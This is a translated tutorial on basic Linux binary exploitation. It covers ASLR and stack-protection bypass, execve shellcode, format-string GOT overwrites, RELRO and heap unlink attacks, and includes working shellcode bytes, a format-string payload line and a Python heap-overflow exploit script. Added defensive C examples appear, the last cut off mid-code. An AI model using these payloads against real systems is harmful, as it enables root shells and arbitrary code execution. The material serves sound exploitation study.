Linux Exploiting (Basic) (SPA)
ASLR
Address randomization
Disable randomization (ASLR) GLOBALLY (root):
echo 0 > /proc/sys/kernel/randomize_va_space
Re-enable randomization GLOBALLY: echo 2 > /proc/sys/kernel/randomize_va_space
Disable it for a single execution (does not require root):
setarch `arch` -R ./ejemplo argumentos
setarch `uname -m` -R ./ejemplo argumentos
Disable stack execution protection
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo
Core file
ulimit -c unlimited
gdb /exec core_file
/etc/security/limits.conf -> * soft core unlimited
Text
Data
BSS
Heap
Stack
BSS section: uninitialized global or static variables
static int i;
DATA section: initialized global or static variables
int i = 5;
TEXT section: code instructions (opcodes)
HEAP section: dynamically allocated buffers (malloc(), calloc(), realloc())
STACK section: the stack (passed arguments, environment strings (env), local variables…)
1. STACK OVERFLOWS
buffer overflow, buffer overrun, stack overrun, stack smashing
Segmentation fault (segment violation): raised when the program tries to access a memory address that has not been assigned to the process.
To get the address of a function inside a program you can run:
objdump -d ./PROGRAMA | grep FUNCION
ROP
Call to sys_execve
{% content-ref url="rop-syscall-execv.md" %} rop-syscall-execv.md {% endcontent-ref %}
2. SHELLCODE
See the kernel syscall numbers: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep "__NR_"
setreuid(0,0); // __NR_setreuid 70
execve("/bin/sh", args[], NULL); // __NR_execve 11
exit(0); // __NR_exit 1
xor eax, eax ; clear eax
xor ebx, ebx ; ebx = 0, there is no argument to pass
mov al, 0x01 ; eax = 1 -> __NR_exit 1
int 0x80 ; run the syscall
nasm -f elf assembly.asm -> produces a .o
ld assembly.o -o shellcodeout -> produces an executable built from the assembly code; the opcodes can then be extracted with objdump
objdump -d -Mintel ./shellcodeout -> to check that it really is our shellcode and to extract the opcodes
Check that the shellcode works
char shellcode[] = "\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; // the exit(0) shellcode assembled above

int main(void) {
    void (*fp)(void);
    fp = (void (*)(void))shellcode; // treat the byte array as a function
    fp();                           // jump into the shellcode (build with the gcc flags given above)
    return 0;
}
To check that the system calls are made correctly, compile the previous program; the system calls should show up in strace ./PROGRAMA_COMPILADO
When writing shellcodes there is a trick that can be used. The first instruction is a jump to a call. The call calls the original code and also pushes the EIP onto the stack. Right after the call instruction we place the string we need, so with that EIP we can point to the string and also keep executing the code.
EXAMPLE OF THE TRICK (/bin/sh):
jmp 0x1f ; jump to the last call
popl %esi ; save in esi the address of the string
movl %esi, 0x8(%esi) ; store the pointer to the string right after it (argv[0])
xorl %eax, %eax ; eax = NULL
movb %eax, 0x7(%esi) ; put a NULL at the end of /bin/sh
movl %eax, 0xc(%esi) ; put a NULL after the argv[0] pointer (argv[1] = NULL)
movl $0xb, %eax ; syscall 11
movl %esi, %ebx ; arg1 = "/bin/sh"
leal 0x8(%esi), %ecx ; arg2 = {"/bin/sh", NULL}
leal 0xc(%esi), %edx ; arg3 = NULL
int $0x80 ; execve("/bin/sh", ["/bin/sh", NULL], NULL)
xorl %ebx, %ebx ; ebx = NULL
movl %ebx, %eax
inc %eax ; syscall 1
int $0x80 ; exit(0)
call -0x24 ; jump back to the first instruction
.string "/bin/sh" ; string to use
EXAMPLE using the stack (/bin/sh):
section .text
global _start
_start:
xor eax, eax ; clear eax
mov al, 0x46 ; syscall 70
xor ebx, ebx ; arg1 = 0
xor ecx, ecx ; arg2 = 0
int 0x80 ; setreuid(0,0)
xor eax, eax ; eax = 0
push eax ; "\0"
push dword 0x68732f2f ; "//sh"
push dword 0x6e69622f ; "/bin"
mov ebx, esp ; arg1 = "/bin//sh\0"
push eax ; NULL -> args[1]
push ebx ; "/bin//sh\0" -> args[0]
mov ecx, esp ; arg2 = args[]
mov al, 0x0b ; syscall 11
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], NULL)
FNSTENV EXAMPLE:
fabs
fnstenv [esp-0x0c]
pop eax ; stores the EIP at which fabs was executed
…
Egg Hunter:
Consists of a small piece of code that walks the memory pages associated with the process looking for the shellcode stored there (it searches for a signature placed in the shellcode). Useful in cases where only a small space is available for injecting code.
Polymorphic shellcodes
These are encrypted shells with a small piece of code that decrypts them and jumps to them, using the Call-Pop trick. This would be an example with Caesar encryption:
global _start
_start:
jmp short magic
init:
pop esi
xor ecx, ecx
mov cl,0 ; replace the 0 with the length of the shellcode (the number of bytes it will walk)
desc:
sub byte[esi + ecx -1], 0 ; replace the 0 with the number of bytes to subtract (Caesar cipher)
sub cl, 1
jnz desc
jmp short sc
magic:
call init
sc:
; the shellcode goes here
Modifying the Frame Pointer (EBP)
Consists of modifying the saved EBP instead of the saved EIP. The epilogue of the vulnerable function:
movl %ebp, %esp
popl %ebp
ret
**Ret2PopRet**
A return into a pop-ret or pop-pop-ret gadget.
Murat's technique
On (32-bit) Linux, process memory is mapped starting at 0xbfffffff.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
    int len;
    unsigned int l;
    char buffer[256];
    int i;
    // the same value is kept signed (len) and unsigned (l)
    len = l = strtoul(argv[1], NULL, 10);
    printf("\nL = %u\n", l);
    printf("\nLEN = %d\n", len);
    // a negative len passes this check while l stays huge
    if (len >= 256){
        printf("\nLongitus excesiva\n");
        exit(1);
    }
    // strlen(argv[2]) < l then holds for any input length
    if(strlen(argv[2]) < l)
        strcpy(buffer, argv[2]);
    else
        printf("\nIntento de hack\n");
    return 0;
}
Format Strings
In C, printf is a function that can be used to print a string. The first parameter this function expects is the raw text with the formatters. The following parameters are the values that substitute the formatters in the raw text.
The vulnerability appears when attacker-controlled text is used as the first argument of this function. The attacker is then able to craft a special input that abuses printf's format string capabilities to write any data at any address, and through that to execute arbitrary code.
Formatters:
%08x -> 8 hex bytes
%d -> Integer
%u -> Unsigned
%s -> String
%n -> Number of written bytes
%hn -> Occupies 2 bytes instead of 4
<n>$X -> Direct access. Example: ("%3$d", var1, var2, var3) -> Access to var3
%n writes the number of written bytes in the indicated address. Writing as many bytes as the number we need to write is how you can write any data.
AAAA%.6000d%4$n -> Writes 6004 in the address indicated by the 4th param
AAAA.%500$08x -> Param at offset 500
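As an added example (not code from the original page): a C scanner that recognises the directive syntax just listed (`%n`, `%hn`, `<n>$`) in untrusted input, shown beside the vulnerable printf call and its hardened form. The names `scan_format_directives`, `echo_vulnerable`, `echo_safe` and `is_safe_for_format` are chosen here, and the sample inputs are constructed from the page's payloads.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Result of scanning untrusted text for printf conversion directives. */
struct fmt_scan {
    int directives;   /* conversions found; "%%" is a literal and is not counted */
    int writes;       /* %n, %hn, %hhn, %ln: directives that WRITE to memory */
    int positional;   /* "%<k>$..." direct-parameter-access directives */
};

/* Walk s the way printf's own parser does: after '%', an optional "<k>$",
 * flags, width, precision and length modifier, then the conversion char. */
struct fmt_scan scan_format_directives(const char *s)
{
    struct fmt_scan r = {0, 0, 0};
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')            /* "%%" prints a literal '%' */
            continue;
        if (*p == '\0')           /* dangling '%' at the end of the string */
            break;
        const char *q = p;
        const char *d = q;        /* positional form: digits followed by '$' */
        while (isdigit((unsigned char)*d))
            d++;
        if (d != q && *d == '$') {
            r.positional++;
            q = d + 1;
        }
        while (*q && strchr("-+ #0", *q))                       /* flags */
            q++;
        while (isdigit((unsigned char)*q) || *q == '*')          /* width */
            q++;
        if (*q == '.') {                                         /* precision */
            q++;
            while (isdigit((unsigned char)*q) || *q == '*')
                q++;
        }
        while (*q && strchr("hlLqjzt", *q))                     /* length modifier */
            q++;
        if (*q == '\0')
            break;
        r.directives++;
        if (*q == 'n')
            r.writes++;
        p = q;                    /* resume after the conversion character */
    }
    return r;
}

/* The vulnerable pattern the page describes: the user's text IS the format,
 * so "%x" reads the stack and "%n" writes memory. Only ever call with trusted text. */
int echo_vulnerable(const char *user)
{
    return printf(user);
}

/* The fix: a constant format; the user's text is passed only as an argument. */
int echo_safe(const char *user)
{
    return printf("%s", user);
}

/* Input-validation helper for code paths where the format cannot be made
 * constant (e.g. a logging wrapper): 1 when the text carries no directive. */
int is_safe_for_format(const char *user)
{
    return scan_format_directives(user).directives == 0;
}

int main(void)
{
    /* Constructed sample: the page's "AAAA%.6000d%4$n" write primitive. */
    const char *payload = "AAAA%.6000d%4$n";
    struct fmt_scan r = scan_format_directives(payload);
    printf("directives=%d writes=%d positional=%d safe=%d\n",
           r.directives, r.writes, r.positional, is_safe_for_format(payload));
    echo_safe(payload);           /* prints the text literally, performs no write */
    putchar('\n');
    return 0;
}
```

Compiling with `gcc -Wformat -Wformat-security` flags the `printf(user)` call in `echo_vulnerable` at build time, which is the cheapest check of all.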
GOT (Global Offsets Table) / PLT (Procedure Linkage Table)
The Global Offset Table is the table a program uses to hold the addresses of the external functions it calls.
The command objdump -s -j .got ./exec prints the table.
Once the executable is loaded in GEF you can see the functions in the GOT with gef➤ x/20x 0xDIR_GOT.
Using GEF you can start a debugging session and execute got to see the GOT table.
The binary loads the addresses of its functions into the GOT from the PLT section. The goal of the exploit is to overwrite the GOT entry of a function that will be executed later with the address of system (for example). Ideally, you overwrite the GOT entry of a function that is going to be called with parameters you control, so that you control what is passed to system.
If system isn't used by the program, the system function won't have an entry in the GOT. In that scenario you first need to leak the address of the system function.
The Procedure Linkage Table is a read-only table in the ELF file that stores all the symbols that need resolution. When one of these functions is called, the GOT redirects the flow to the PLT so it can resolve the function's address and write it into the GOT. The next time that address is called, the function is called directly without needing to resolve it again.
You can see the PLT addresses with objdump -j .plt -d ./vuln_binary.
Exploit Flow
The goal is to overwrite the address of a function in the GOT that is going to be called later. Ideally this address would point to a shellcode in an executable section, but you most likely won't be able to write a shellcode into an executable section. Instead, overwrite the entry of a function that receives its arguments from the user and point it to the system function.
To write the address, usually 2 steps are done: first 2 bytes of the address are written, then the other 2. To do this $hn is used.
HOB is the name given to the 2 higher bytes of the address; LOB to the 2 lower bytes.
Because of how the format string works, you need to write first the smaller of [HOB, LOB] and then the other one.
HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]$hn%.[LOB-HOB]x%[offset+1]$hn
HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]$hn%.[HOB-LOB]x%[offset]$hn
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'`
Format String Exploit Template
You can find a template to exploit the GOT using format strings here:
{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}
.fini_array
Essentially this is a structure with functions that are called before the program finishes. This is interesting if you can call your shellcode just by jumping to an address, or in cases where you need to go back to main again to exploit the format string a second time.
objdump -s -j .fini_array ./greeting
./greeting: file format elf32-i386
Contents of section .fini_array:
8049934 a0850408
#Put your address in 0x8049934
Note that this won't create an eternal loop: when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be called again. So with this you get 1 more execution of the vuln.
Format Strings to Dump Content
A format string can also be abused to dump content from the memory of the program.
For example, in the following situation there is a local variable in the stack pointing to a flag. If you find where in memory the pointer to the flag is, you can make printf access that address and print the flag:
So, the flag is at 0xffffcf4c
And from the leak you can see that the pointer to the flag is the 8th parameter:
So, accessing the 8th parameter you can get the flag:
Note that, following the previous exploit and realising that you can leak content, you can set pointers for printf to the section where the executable is loaded and dump it entirely!
DTOR
{% hint style="danger" %} Nowadays it is very weird to find a binary with a dtor section. {% endhint %}
The destructor functions are executed before the program finishes.
If you manage to write the address of a shellcode into __DTOR_END__, it will be executed before the program ends.
Get the address of this section with:
objdump -s -j .dtors /exec
rabin -s /exec | grep "__DTOR"
The DTOR section usually sits between the values ffffffff and 00000000.
Relro
Relro (Read only Relocation) affects the memory permissions in a way similar to NX. If relro is enabled, some things are made read-only so we can't write to them.
gef➤ vmmap
Start End Offset Perm Path
0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /tmp/tryc
0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /tmp/tryc
0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /tmp/tryc
0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /tmp/tryc
0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /tmp/tryc
0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap]
0x00007ffff7dcb000 0x00007ffff7df0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7df0000 0x00007ffff7f63000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7f63000 0x00007ffff7fac000 0x0000000000198000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fac000 0x00007ffff7faf000 0x00000000001e0000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7faf000 0x00007ffff7fb2000 0x00000000001e3000 rw- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fb2000 0x00007ffff7fb8000 0x0000000000000000 rw-
0x00007ffff7fce000 0x00007ffff7fd1000 0x0000000000000000 r-- [vvar]
0x00007ffff7fd1000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso]
0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7fd3000 0x00007ffff7ff4000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ff4000 0x00007ffff7ffc000 0x0000000000022000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤ p fgets
$2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets>
gef➤ search-pattern 0x7ffff7e4d100
[+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory
[+] In '/tmp/tryc'(0x555555557000-0x555555558000), permission=r--
0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]"
Now the same for a binary without relro:
gef➤ vmmap
Start End Offset Perm Path
0x0000000000400000 0x0000000000401000 0x0000000000000000 r-- /tmp/try
0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x /tmp/try
0x0000000000402000 0x0000000000403000 0x0000000000002000 r-- /tmp/try
0x0000000000403000 0x0000000000404000 0x0000000000002000 r-- /tmp/try
0x0000000000404000 0x0000000000405000 0x0000000000003000 rw- /tmp/try
0x0000000000405000 0x0000000000426000 0x0000000000000000 rw- [heap]
0x00007ffff7dcb000 0x00007ffff7df0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7df0000 0x00007ffff7f63000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7f63000 0x00007ffff7fac000 0x0000000000198000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fac000 0x00007ffff7faf000 0x00000000001e0000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7faf000 0x00007ffff7fb2000 0x00000000001e3000 rw- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fb2000 0x00007ffff7fb8000 0x0000000000000000 rw-
0x00007ffff7fce000 0x00007ffff7fd1000 0x0000000000000000 r-- [vvar]
0x00007ffff7fd1000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso]
0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7fd3000 0x00007ffff7ff4000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ff4000 0x00007ffff7ffc000 0x0000000000022000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤ p fgets
$2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets>
gef➤ search-pattern 0x7ffff7e4d100
[+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory
[+] In '/tmp/try'(0x404000-0x405000), permission=rw-
0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]"
For the binary without relro, we can see that the GOT entry address for fgets is 0x404018. Looking at the memory mappings we see that it falls between 0x404000 and 0x405000, which has the permissions rw-, meaning we can read and write to it. For the binary with relro, we see that the GOT entry address for this run of the binary (PIE is enabled, so this address will change) is 0x555555557fd0. In that binary's memory mapping it falls between 0x0000555555557000 and 0x0000555555558000, which has the memory permission r--, meaning that we can only read from it.
So what's the bypass? The typical bypass I use is simply not to write to the memory regions that relro makes read only, and to find a different way to get code execution.
Note that for this to work the binary needs to know the addresses of the functions before execution:
- Lazy binding: The address of a function is looked up the first time the function is called. So, the GOT needs to have write permissions during execution.
- Bind now: The addresses of the functions are resolved at the beginning of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr.
`-z relro` and `-z now`
To check if a program uses Bind now you can do:
readelf -l /proc/ID_PROC/exe | grep BIND_NOW
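As an added example (not code from the original page), the following C program does programmatically what the two vmmap listings above do by eye: it parses `/proc/<pid>/maps`-style text and reports whether a given address, such as the GOT entry for fgets, lies inside a writable mapping. The sample maps text is constructed from the two listings above, rewritten in the `/proc/<pid>/maps` layout; the device and inode columns are placeholders.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stdint.h>
#include <inttypes.h>

/* Added example: decide whether an address (e.g. a GOT entry) is in a
 * writable mapping, given the text of /proc/<pid>/maps. */

typedef struct {
    uint64_t start, end;
    char perms[5];          /* e.g. "rw-p" */
} mapping_t;

/* Parse one /proc/<pid>/maps line: "start-end perms offset dev inode [path]". */
static bool parse_maps_line(const char *line, mapping_t *m)
{
    return sscanf(line, "%" SCNx64 "-%" SCNx64 " %4s",
                  &m->start, &m->end, m->perms) == 3;
}

/* Find the mapping containing addr. Returns true and fills *out (if not NULL). */
bool find_mapping(const char *maps, uint64_t addr, mapping_t *out)
{
    const char *p = maps;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        mapping_t m;
        if (parse_maps_line(line, &m) && addr >= m.start && addr < m.end) {
            if (out) *out = m;
            return true;
        }
        if (!nl) break;
        p = nl + 1;
    }
    return false;
}

/* True only if addr is mapped and the mapping carries the 'w' permission. */
bool address_writable(const char *maps, uint64_t addr)
{
    mapping_t m;
    return find_mapping(maps, addr, &m) && m.perms[1] == 'w';
}

/* Constructed sample input, derived from the vmmap listings above (binary
 * without relro, /tmp/try). dev/inode fields are placeholders. */
static const char MAPS_NO_RELRO[] =
    "00400000-00401000 r--p 00000000 08:01 1 /tmp/try\n"
    "00401000-00402000 r-xp 00001000 08:01 1 /tmp/try\n"
    "00402000-00403000 r--p 00002000 08:01 1 /tmp/try\n"
    "00403000-00404000 r--p 00002000 08:01 1 /tmp/try\n"
    "00404000-00405000 rw-p 00003000 08:01 1 /tmp/try\n"
    "00405000-00426000 rw-p 00000000 00:00 0 [heap]\n";

/* Constructed sample input for the relro + PIE binary (/tmp/tryc). */
static const char MAPS_RELRO[] =
    "555555554000-555555555000 r--p 00000000 08:01 2 /tmp/tryc\n"
    "555555555000-555555556000 r-xp 00001000 08:01 2 /tmp/tryc\n"
    "555555556000-555555557000 r--p 00002000 08:01 2 /tmp/tryc\n"
    "555555557000-555555558000 r--p 00002000 08:01 2 /tmp/tryc\n"
    "555555558000-555555559000 rw-p 00003000 08:01 2 /tmp/tryc\n";

int main(void)
{
    uint64_t got_fgets_norelro = 0x404018;        /* from the listing above */
    uint64_t got_fgets_relro   = 0x555555557fd0;  /* from the listing above */
    printf("no-relro GOT entry writable: %s\n",
           address_writable(MAPS_NO_RELRO, got_fgets_norelro) ? "yes" : "no");
    printf("relro GOT entry writable:    %s\n",
           address_writable(MAPS_RELRO, got_fgets_relro) ? "yes" : "no");
    return 0;
}
```

On a live process the same check is `address_writable()` over the contents of `/proc/<pid>/maps`; a GOT entry that lands in an `r--p` mapping is the sign that full RELRO is in effect.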
Hacking Techniques for Linux Exploitation (Basic ESP)
Overview
When the binary is loaded into memory and a function is called for the first time, execution jumps to the PLT (Procedure Linkage Table); from there a jump (jmp) is made to the GOT, where it finds that the entry has not been resolved yet (it contains the address of the next instruction of the PLT). It therefore invokes the Runtime Linker (rtld) to resolve the address and store it in the GOT.
When a function is called, the PLT is called; it holds the address of the GOT entry where the function's address is stored, so it redirects the flow there and the function is called. However, if it is the first time the function is called, what the GOT holds is the next instruction of the PLT, so the flow continues through the PLT code (rtld), finds the function's address, stores it in the GOT and calls it.
When a binary is loaded into memory, the compiler has told it at which offset it has to place the data that must be loaded when the program runs.
Lazy binding —> The function's address is looked up the first time that function is called, so the GOT has write permissions so that, once found, it is stored there and does not have to be looked up again.
Bind now —> The addresses of the functions are looked up when the program is loaded and the permissions of the .got, .dtors, .ctors, .dynamic and .jcr sections are changed to read only. -z relro and -z now
Despite this, programs are generally not compiled with these options, so these attacks are still possible.
readelf -l /proc/ID_PROC/exe | grep BIND_NOW —> To find out whether BIND NOW is used
Fortify Source -D_FORTIFY_SOURCE=1 or =2
It tries to identify functions that copy from one place to another in an unsafe way and replace them with a safe version.
For example:
char buf[16];
strcpy(buf, source);
It is identified as unsafe, so strcpy() is replaced by __strcpy_chk(), using the buffer size as the maximum number of bytes to copy.
The difference between =1 and =2 is that:
The second does not allow %n to come from a section with write permissions. In addition, the direct-argument-access parameter can only be used if the previous ones have been used, that is, %3$d can only be used if %2$d and %1$d were used before.
argv[0] is used to display the error message, so if the address of some other location (such as a global variable) is placed in it, the error message will show the contents of that variable. Page 191
Libsafe replacement
Enabled with: LD_PRELOAD=/lib/libsafe.so.2
or
echo "/lib/libsafe.so.2" > /etc/ld.so.preload
Calls to some unsafe functions are intercepted and replaced by safe ones. It is not standardized (x86 only, not for builds with -fomit-frame-pointer, not for static builds, not every vulnerable function becomes safe, and LD_PRELOAD does not work on suid binaries).
ASCII Armored Address Space
It consists of loading the shared libraries between 0x00000000 and 0x00ffffff so that there is always a 0x00 byte in their addresses. However, this hardly stops any attack at all, and even less so on little endian.
ret2plt
It consists of performing a ROP so that strcpy@plt (from the plt) is called with the GOT entry as destination, copying the first byte of the function to be called (system()). Then the same is done pointing at GOT+1, copying the 2nd byte of system()... Finally, the address stored in the GOT is called, which will be system().
Fake EBP
For functions that use EBP as the register to point to the arguments, when modifying EIP to point to system() the EBP must also have been modified so that it points to a memory zone containing any 2 bytes followed by the address of &"/bin/sh".
chroot() jails
debootstrap --arch=i386 hardy /home/user —> Installs a basic system under a specific subdirectory
An admin can escape one of these jails by doing: mkdir foo; chroot foo; cd ..
Code instrumentation
Valgrind —> Looks for errors
Memcheck
RAD (Return Address Defender)
Insure++
8 Heap Overflows: Basic exploits
Allocated chunk
prev_size |
size | —Header
*mem | Data
Free chunk
prev_size |
size |
*fd | Ptr forward chunk
*bk | Ptr back chunk —Header
*mem | Data
Free chunks are kept in a doubly linked list (bin) and there can never be two free chunks next to each other (they are merged).
In "size" there are bits to indicate: whether the previous chunk is in use, whether the chunk was allocated via mmap() and whether the chunk belongs to the main arena.
If, when freeing a chunk, one of the adjacent chunks is free, they are merged via the unlink() macro and the new, larger chunk is passed to frontlink() so that it inserts it into the appropriate bin.
unlink(){
BK = P->bk; —> The BK of the new chunk is the one the already-free chunk had
FD = P->fd; —> The FD of the new chunk is the one the already-free chunk had
FD->bk = BK; —> The BK of the next chunk points to the new chunk
BK->fd = FD; —> The FD of the previous chunk points to the new chunk
}
Therefore, if we manage to modify P->bk with the address of a shellcode and P->fd with the address of an entry in the GOT or DTORS minus 12, we achieve:
BK = P->bk = &shellcode
FD = P->fd = &__dtor_end__ - 12
FD->bk = BK -> *((&__dtor_end__ - 12) + 12) = &shellcode
And so the shellcode is executed when the program exits.
Moreover, the 4th statement of unlink() writes something, and the shellcode has to be prepared for this:
BK->fd = FD -> *(&shellcode + 8) = (&__dtor_end__ - 12) —> This causes 4 bytes to be written starting at the 8th byte of the shellcode, so the first instruction of the shellcode must be a jmp to skip over this and land on some nops that lead to the rest of the shellcode.
Therefore the exploit is built as follows:
In buffer1 we place the shellcode, starting with a jmp so that it lands on the nops or on the rest of the shellcode.
After the shellcode we put padding until we reach the prev_size and size fields of the next chunk. In these we put 0xfffffff0 (so that prev_size is overwritten with the bit saying it is free) and "-4" (0xfffffffc) in size (so that when it checks in the 3rd chunk whether the 2nd was free it actually reads the modified prev_size, which will say it is free) -> So when free() examines it, it will go to the size of the 3rd chunk but actually land at the 2nd - 4 and think that the 2nd chunk is free. It will then call unlink().
When calling unlink() it will use the first data of the 2nd chunk as P->fd, so that is where the address to overwrite - 12 goes (since in FD->bk it adds 12 to the address stored in FD). And at that address it will write the second address it finds in the 2nd chunk.
import os
from struct import pack

shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
prev_size = pack("<I", 0xfffffff0) # We want the bit indicating that the previous chunk is free to be set to 1
fake_size = pack("<I", 0xfffffffc) # -4, so that it thinks the "size" of the 3rd chunk is 4 bytes back (pointing at prev_size), since that is where it checks whether the 2nd chunk is free
addr_sc = pack("<I", 0x0804a008 + 8) # At the start of the payload we will put 8 bytes of padding
got_free = pack("<I", 0x08048300 - 12) # Address of free() in the plt - 12 (this is the address that will be overwritten so that the shellcode is launched the 2nd time free is called)
payload = "aaaabbbb" + shellcode + "b"*(512-len(shellcode)-8) # As said, the payload starts with 8 bytes of padding, just because
payload += prev_size + fake_size + got_free + addr_sc # The 2nd chunk is modified; got_free points to where we will store the address addr_sc + 12
os.system("./8.3.o " + payload)
unset() freeing in reverse order (wargame)
We control 3 consecutive chunks and they are freed in the reverse order to that in which they were allocated.
In that case:
The shellcode is placed in chunk c
Chunk a is used to overwrite b so that its size has the PREV_INUSE bit cleared, making it think that chunk a is free.
In addition, the size in header b is overwritten so that it is -4.
Then the program will think that "a" is free and in a bin, so it will call unlink() to unlink it. However, since the PREV_SIZE header is -4, it will think that chunk "a" actually starts at b+4. That is, it will do an unlink() on a chunk starting at b+4, so the "fd" pointer will be at b+12 and the "bk" pointer at b+16.
In this way, if we put the address of the shellcode in bk and the address of the "puts()" function - 12 in fd, we have our payload.
Frontlink technique
frontlink is called when something is freed and none of its adjacent chunks are free: unlink() is not called, frontlink() is called directly.
Useful vulnerability when the malloc under attack is never freed (free()).
It needs:
A buffer that can be overflowed with the data input function
A buffer adjacent to it that must be freed and whose header's fd field will be modified thanks to the overflow of the previous buffer
A buffer to be freed with a size greater than 512 but smaller than the previous buffer
A buffer declared before step 3 that allows overwriting its prev_size
In this way, by managing to overwrite two mallocs in an uncontrolled way and one in a controlled way, while only that one is freed, we can build an exploit.
double free() vulnerability
If free() is called twice with the same pointer, two bins end up pointing to the same address.
If you want to reuse one of them, it would be assigned without problems. If you want to use the other, it would be assigned the same space, so we would have the "fd" and "bk" pointers forged with the data that the previous allocation writes.
After free()
A previously freed pointer is used again without any control.
8 Heap Overflows: Advanced exploits
The Unlink() and FrontLink() techniques were eliminated by modifying the unlink() function.
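The following C program is an added example, not glibc source and not code from the original page. It models the chunk header described in the basic section (the three flag bits in `size`) and puts the old unlink() macro, whose `FD->bk = BK` write is what the unlink technique above relied on, next to the hardened form that glibc introduced, which refuses to unlink a chunk whose neighbours do not point back at it. The chunk structures are built locally in memory; no real heap is involved.

```c
#include <stddef.h>
#include <stdbool.h>
#include <stdio.h>

/* Added example (not glibc source): reduced model of a malloc chunk header
 * and of the old and the hardened unlink() macro. */

#define PREV_INUSE     0x1   /* previous chunk is in use */
#define IS_MMAPPED     0x2   /* chunk was obtained with mmap() */
#define NON_MAIN_ARENA 0x4   /* chunk does not belong to the main arena */
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

typedef struct chunk {
    size_t prev_size;     /* size of the previous chunk, valid only if it is free */
    size_t size;          /* chunk size, with the flag bits in the 3 low bits */
    struct chunk *fd;     /* forward pointer (only meaningful while free) */
    struct chunk *bk;     /* backward pointer (only meaningful while free) */
} chunk_t;

size_t chunk_size(size_t size)           { return size & ~(size_t)SIZE_BITS; }
bool   prev_inuse(size_t size)           { return (size & PREV_INUSE) != 0; }
bool   chunk_is_mmapped(size_t size)     { return (size & IS_MMAPPED) != 0; }
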